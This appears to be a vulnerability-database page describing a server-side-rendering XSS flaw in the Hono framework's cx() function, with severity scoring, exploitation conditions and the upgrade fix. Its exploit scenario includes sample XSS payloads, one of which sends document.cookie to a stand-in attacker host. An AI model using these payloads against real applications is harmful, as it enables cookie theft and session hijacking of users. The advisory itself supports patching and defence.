Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Scope:Changed because SSR injection crosses to victim browser; PR:N as attacker only supplies untrusted input; UI:R since victim must load the rendered page; no availability impact.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
Hono is a Web application framework that provides support for any JavaScript runtime. From 4.0.0 before 4.12.27, cx() in hono/css composes class names from plain strings but marks the result as already escaped without HTML-escaping the input, allowing untrusted className values used in a JSX class attribute during server-side rendering to break out of the attribute and inject arbitrary markup. This issue is fixed in version 4.12.27.
AnalysisAI
Server-side rendering XSS in Hono's hono/css module (versions 4.0.0 through 4.12.26) allows injection of arbitrary HTML markup by exploiting the cx() function's failure to HTML-escape input before marking it as safe. When untrusted data flows into a cx() call used in a JSX class attribute during SSR, attackers can break out of the attribute context and inject arbitrary markup or script into the rendered page delivered to victims. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires three concurrent conditions: (1) the application runs Hono version 4.0.0 through 4.12.26; (2) the application uses the cx() function from hono/css within a JSX class attribute during server-side rendering; and (3) at least one argument to cx() is derived from untrusted, attacker-influenced input (e.g., query parameters, user-supplied data, database values not separately sanitized). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N scoring 6.1 (Medium) is well-calibrated for this vulnerability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker targets a Hono SSR application that reflects a user-controlled value - such as a URL query parameter or stored user preference - into a JSX class attribute via cx(). By supplying a crafted value such as `legit-class" onmouseover="alert(document.cookie)` or `x"><img src=x onerror=fetch('https://attacker.example/'+document.cookie)>`, the attacker causes the SSR output to include unescaped HTML, injecting a malicious event handler or script tag. … |
| Remediation | Upgrade Hono to version 4.12.27 or later, which resolves the improper escaping in cx() per the GitHub release at https://github.com/honojs/hono/releases/tag/v4.12.27. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Hono, a web framework, prior to version 4.6.5 is vulnerable to bypass of cross-site request forgery (CSRF) middleware by
Hono is a Web application framework that provides support for any JavaScript runtime. Rated medium severity (CVSS 5.3),
Hono is a Web application framework that provides support for any JavaScript runtime. Rated medium severity (CVSS 5.0),
Hono is a web framework written in TypeScript. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploita
Hono is a Web application framework that provides support for any JavaScript runtime. [CVSS 8.2 HIGH]
Hono versions before 4.11.4 allow JWT algorithm confusion attacks through improper algorithm validation in the JWK/JWKS
Hono before version 4.11.4 contains a JWT algorithm confusion vulnerability in its JWK/JWKS verification middleware that
Hono versions prior to 4.12.4 suffer from an authentication bypass in serveStatic when combined with route-based middlew
In Eclipse Hono version 1.3.0 and 1.4.0 the AMQP protocol adapter does not verify the size of AMQP messages received fro
Header injection in Hono's CORS middleware exposes applications to cache key pollution across versions before 4.10.3. Wh
Missing cookie name validation on the write path in Hono's setCookie(), serialize(), and serializeSigned() functions all
Server-side rendering in Hono's JSX module (versions 4.11.8 through before 4.12.27) fails to isolate context values per
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42327